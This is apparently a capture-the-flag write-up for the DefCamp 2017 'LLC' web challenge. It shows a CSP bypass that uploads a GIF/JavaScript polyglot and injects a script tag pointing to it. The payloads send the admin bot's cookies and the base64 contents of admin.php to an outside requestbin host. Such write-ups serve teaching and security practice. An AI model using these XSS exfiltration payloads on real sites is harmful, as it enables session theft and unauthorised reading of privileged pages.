DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup

Problem description

We are looking for your feedback about our new amazing company! :-)

looking at the website we notice after submitting the form we got our inputs sent as they are

so maybe an xss? lets try

the problem here we got csp

content-security-policy: default-src 'none'; img-src 'self' *.imgur.com *.ibb.co; script-src 'self'; connect-src 'self'; style-src 'self' fonts.googleapis.com fonts.gstatic.com 'unsafe-inline'; font-src 'self' fonts.gstatic.com  fonts.googleapis.com;

the good part is that script-src points to 'self' so if we can use that upload function somehow to upload our js payload we can execute our exploit successfully

the form only accepts jpg jpeg png and gif with 500byte max file size

also there is image format check not only extension

so an image xss polyglot would solve this

here my gif payload

GIF89a= 'MUMBOJUMBOBOGUSBACON';document.location="https://requestb.in/um61ebum?v="+document.cookie;

we get our GIF link from the submited form result

then we resend our payload in the name and message fields with our js

<script type="text/javascript" charset="ISO-8859-1" src="__f8f2bb3ab8715ec9dfc6b89173c06a9f/xss.gif"></script>

and the bot connects back

QUERYSTRING

v: USERID=<SCRIPT>alert('XSS')</SCRIPT>

HEADERS

Accept-Encoding: gzip

Connect-Time: 1

Via: 1.1 vegur

Cf-Ray: 3a7bb8703f8e0f81-FRA

Cf-Connecting-Ip: 45.76.95.55

Cf-Visitor: {"scheme":"https"}

X-Request-Id: ec71d7c7-de29-4dd4-aca9-5186fa95060e

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Host: requestb.in

Connection: close

Cookie: __cfduid=d8c8eca22ffed482d0d816ebe7ae673731506696251

Accept-Language: en-US,*

Cf-Ipcountry: DE

Total-Route-Time: 0

Referer: https://llc.dctf-quals-17.def.camp//bot.php?id=8173

User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1

nothing significant in the cookies

we notice there is a nice page bot.php 

requesting the page our selves gives nothing important

so lets make admin request it for us with his privilege

new payload

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "bot.php?id=", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);

also still no flag yet

after a while of searching suddenly came across admin.php page

and we make admin get us the page

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "admin.php", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);

and we got a flag in response

DCTF{808f50ca3f3182a30e76bb9fcc0fdcb7f75f4ce597f7abe1793e3942acf3ec9e}

Note: i dont get how js in .gif file works with the nosniff flag in headers

i think its served from cloudflare and admin is browsing the website without cloudflare? or from the bot js library used ?